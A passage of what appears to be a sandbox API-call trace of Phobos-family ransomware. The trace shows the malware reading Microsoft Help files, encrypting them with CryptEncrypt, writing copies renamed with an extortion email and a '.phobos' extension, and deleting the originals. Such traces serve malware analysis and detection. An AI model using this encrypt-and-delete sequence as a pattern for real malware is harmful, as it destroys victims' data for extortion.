lpNumberOfBytesRead=0x2e0f92c*=0x186, lpOverlapped=0x0) returned 1 [0178.230] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x190, dwBufLen=0x190 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x190) returned 1 [0178.230] WriteFile (in: hFile=0x180, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x190, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x190, lpOverlapped=0x0) returned 1 [0178.231] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32c28) returned 1 [0178.231] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0178.231] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x30, dwBufLen=0x30 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x30) returned 1 [0178.231] CryptDestroyKey (hKey=0xa32c28) returned 1 [0178.231] WriteFile (in: hFile=0x180, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xe2, lpOverlapped=0x0) returned 1 [0178.231] CryptDestroyKey (hKey=0xa32de8) returned 1 [0178.231] CloseHandle (hObject=0x140) returned 1 [0178.231] CloseHandle (hObject=0x180) returned 1 [0178.231] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\Hx.hxn" (normalized: "c:\\programdata\\microsoft help\\hx.hxn")) returned 1 [0178.232] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0178.232] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.excel.dev.14.1033.hxn"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0178.234] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=350) returned 1 [0178.234] CloseHandle (hObject=0x180) returned 1 [0178.234] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.excel.dev.14.1033.hxn")) returned 0x2022 [0178.234] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft help\\ms.excel.dev.14.1033.hxn.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0178.235] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.excel.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0178.235] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0178.235] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0178.235] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft help\\ms.excel.dev.14.1033.hxn.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0178.235] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32de8) returned 1 [0178.235] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0178.235] ReadFile (in: hFile=0x180, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x15e, lpOverlapped=0x0) returned 1 [0178.237] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x160, dwBufLen=0x160 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x160) returned 1 [0178.237] WriteFile (in: hFile=0x140, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x160, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x160, lpOverlapped=0x0) returned 1 [0178.238] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32c28) returned 1 [0178.238] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0178.238] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60, dwBufLen=0x60 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60) returned 1 [0178.238] CryptDestroyKey (hKey=0xa32c28) returned 1 [0178.238] WriteFile (in: hFile=0x140, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x112, lpOverlapped=0x0) returned 1 [0178.238] CryptDestroyKey (hKey=0xa32de8) returned 1 [0178.238] CloseHandle (hObject=0x180) returned 1 [0178.238] CloseHandle (hObject=0x140) returned 1 [0178.238] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.excel.dev.14.1033.hxn")) returned 1 [0178.239] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0178.239] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.graph.14.1033.hxn"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0178.240] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=326) returned 1 [0178.240] CloseHandle (hObject=0x140) returned 1 [0178.240] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.graph.14.1033.hxn")) returned 0x2022 [0178.240] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft help\\ms.graph.14.1033.hxn.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0178.240] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.graph.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0178.240] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0178.240] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0178.240] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft help\\ms.graph.14.1033.hxn.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0178.240] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32de8) returned 1 [0178.240] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0178.240] ReadFile (in: hFile=0x140, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x146, lpOverlapped=0x0) returned 1 [0178.241] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x150, dwBufLen=0x150 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x150) returned 1 [0178.241] WriteFile (in: hFile=0x180, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x150, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x150, lpOverlapped=0x0) returned 1 [0178.242] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32c28) returned 1 [0178.242] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0178.242] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0178.242] CryptDestroyKey (hKey=0xa32c28) returned 1 [0178.242] WriteFile (in: hFile=0x180, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0178.243] CryptDestroyKey (hKey=0xa32de8) returned 1 [0178.243] CloseHandle (hObject=0x140) returned 1 [0178.243] CloseHandle (hObject=0x180) returned 1 [0178.243] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.graph.14.1033.hxn")) returned 1 [0178.244] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0178.244] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.groove.14.1033.hxn"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0178.244] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=332) returned 1 [0178.244] CloseHandle (hObject=0x180) returned 1 [0178.244] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.groove.14.1033.hxn")) returned 0x2022 [0178.244] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft help\\ms.groove.14.1033.hxn.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0178.244] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.groove.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0178.244] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0178.244] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0178.244] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft help\\ms.groove.14.1033.hxn.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0178.245] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32de8) returned 1 [0178.245] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0178.245] ReadFile (in: hFile=0x180, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x14c, lpOverlapped=0x0) returned 1 [0178.245] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x150, dwBufLen=0x150 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x150) returned 1 [0178.245] WriteFile (in: hFile=0x140, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x150, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x150, lpOverlapped=0x0) returned 1 [0178.246] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32c28) returned 1 [0178.246] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0178.246] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0178.246] CryptDestroyKey (hKey=0xa32c28) returned 1 [0178.246] WriteFile (in: hFile=0x140, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0178.246] CryptDestroyKey (hKey=0xa32de8) returned 1 [0178.246] CloseHandle (hObject=0x180) returned 1 [0178.246] CloseHandle (hObject=0x140) returned 1 [0178.246] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.groove.14.1033.hxn")) returned 1 [0178.247] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0178.247] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.infopath.14.1033.hxn"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0178.248] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=344) returned 1 [0178.248] CloseHandle (hObject=0x140) returned 1 [0178.248] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.infopath.14.1033.hxn")) returned 0x2022 [0178.248] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft help\\ms.infopath.14.1033.hxn.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0178.248] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.infopath.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0178.248] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0178.248] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0178.248] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft help\\ms.infopath.14.1033.hxn.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0178.248] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32de8) returned 1 [0178.248] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0178.248] ReadFile (in: hFile=0x140, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x158, lpOverlapped=0x0) returned 1 [0178.249] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x160, dwBufLen=0x160 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x160) returned 1 [0178.249] WriteFile (in: hFile=0x180, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x160, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x160, lpOverlapped=0x0) returned 1 [0178.250] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32c28) returned 1 [0178.250] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0178.250] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0178.250] CryptDestroyKey (hKey=0xa32c28) returned 1 [0178.250] WriteFile (in: hFile=0x180, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0178.250] CryptDestroyKey (hKey=0xa32de8) returned 1 [0178.250] CloseHandle (hObject=0x140) returned 1 [0178.250] CloseHandle (hObject=0x180) returned 1 [0178.250] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.infopath.14.1033.hxn")) returned 1 [0178.251] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0178.251] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.infopatheditor.14.1033.hxn"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0178.251] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=380) returned 1 [0178.251] CloseHandle (hObject=0x180) returned 1 [0178.251] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.infopatheditor.14.1033.hxn")) returned 0x2022 [0178.251] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft help\\ms.infopatheditor.14.1033.hxn.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0178.251] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.infopatheditor.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0178.252] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0178.252] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0178.252] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft help\\ms.infopatheditor.14.1033.hxn.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0178.252] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32de8) returned 1 [0178.252] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0178.252] ReadFile (in: hFile=0x180, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x17c, lpOverlapped=0x0) returned 1 [0178.253] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x180, dwBufLen=0x180 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x180) returned 1 [0178.253] WriteFile (in: hFile=0x140, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x180, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x180, lpOverlapped=0x0) returned 1 [0178.254] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32c28) returned 1 [0178.254] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0178.254] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60, dwBufLen=0x60 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60) returned 1 [0178.254] CryptDestroyKey (hKey=0xa32c28) returned 1 [0178.254] WriteFile (in: hFile=0x140, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x112, lpOverlapped=0x0) returned 1 [0178.254] CryptDestroyKey (hKey=0xa32de8) returned 1 [0178.254] CloseHandle (hObject=0x180) returned 1 [0178.254] CloseHandle (hObject=0x140) returned 1 [0178.254] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.infopatheditor.14.1033.hxn")) returned 1 [0178.255] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0178.255] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.msaccess.14.1033.hxn"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0178.255] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=344) returned 1 [0178.255] CloseHandle (hObject=0x140) returned 1 [0178.255] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.msaccess.14.1033.hxn")) returned 0x2022 [0178.255] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft help\\ms.msaccess.14.1033.hxn.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0178.255] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.msaccess.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0178.256] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, 